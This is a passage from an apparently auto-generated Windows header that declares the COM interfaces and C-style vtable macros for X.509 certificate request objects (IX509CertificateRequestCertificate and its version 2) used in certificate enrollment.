    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCertificate_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestCertificate_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestCertificate_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestCertificate_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestCertificate_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestCertificate_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestCertificate_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_ReuseKey(This,pValue)	\
    ( (This)->lpVtbl -> get_ReuseKey(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_OldCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_OldCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_get_Subject(This,ppValue)	\
    ( (This)->lpVtbl -> get_Subject(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_Subject(This,pValue)	\
    ( (This)->lpVtbl -> put_Subject(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_CspStatuses(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspStatuses(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_SmimeCapabilities(This,pValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_SmimeCapabilities(This,Value)	\
    ( (This)->lpVtbl -> put_SmimeCapabilities(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_KeyContainerNamePrefix(This,pValue)	\
    ( (This)->lpVtbl -> get_KeyContainerNamePrefix(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_KeyContainerNamePrefix(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerNamePrefix(This,Value) ) 

#define IX509CertificateRequestCertificate_get_CryptAttributes(This,ppValue)	\
    ( (This)->lpVtbl -> get_CryptAttributes(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_SuppressOids(This,ppValue)	\
    ( (This)->lpVtbl -> get_SuppressOids(This,ppValue) ) 

#define IX509CertificateRequestCertificate_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_GetCspStatuses(This,KeySpec,ppCspStatuses)	\
    ( (This)->lpVtbl -> GetCspStatuses(This,KeySpec,ppCspStatuses) ) 


#define IX509CertificateRequestCertificate_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRequestCertificate_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRequestCertificate_get_NotBefore(This,pValue)	\
    ( (This)->lpVtbl -> get_NotBefore(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_NotBefore(This,Value)	\
    ( (This)->lpVtbl -> put_NotBefore(This,Value) ) 

#define IX509CertificateRequestCertificate_get_NotAfter(This,pValue)	\
    ( (This)->lpVtbl -> get_NotAfter(This,pValue) ) 

#define IX509CertificateRequestCertificate_put_NotAfter(This,Value)	\
    ( (This)->lpVtbl -> put_NotAfter(This,Value) ) 

#define IX509CertificateRequestCertificate_get_SerialNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_SerialNumber(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate_put_SerialNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_SerialNumber(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRequestCertificate_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequestCertificate_INTERFACE_DEFINED__ */


#ifndef __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__
#define __IX509CertificateRequestCertificate2_INTERFACE_DEFINED__

/* interface IX509CertificateRequestCertificate2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestCertificate2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab35a-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestCertificate2 : public IX509CertificateRequestCertificate
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplate( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPrivateKeyTemplate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyServer( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestCertificate2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestCertificate2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        HRESULT ( STDMETHODCALLTYPE *CheckPublicKeySignature )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Issuer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotBefore )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__out DATE *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_NotAfter )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ DATE Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SerialNumber )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKeyTemplate )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in_opt IX509EnrollmentPolicyServer *pPolicyServer,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyServer )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentPolicyServer **ppPolicyServer);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateRequestCertificate2 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppTemplate);
        
        END_INTERFACE
    } IX509CertificateRequestCertificate2Vtbl;

    interface IX509CertificateRequestCertificate2
    {
        CONST_VTBL struct IX509CertificateRequestCertificate2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestCertificate2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestCertificate2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestCertificate2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestCertificate2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestCertificate2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestCertificate2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestCertificate2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestCertificate2_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestCertificate2_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestCertificate2_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestCertificate2_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestCertificate2_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestCertificate2_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestCertificate2_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestCertificate2_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestCertificate2_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestCertificate2_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

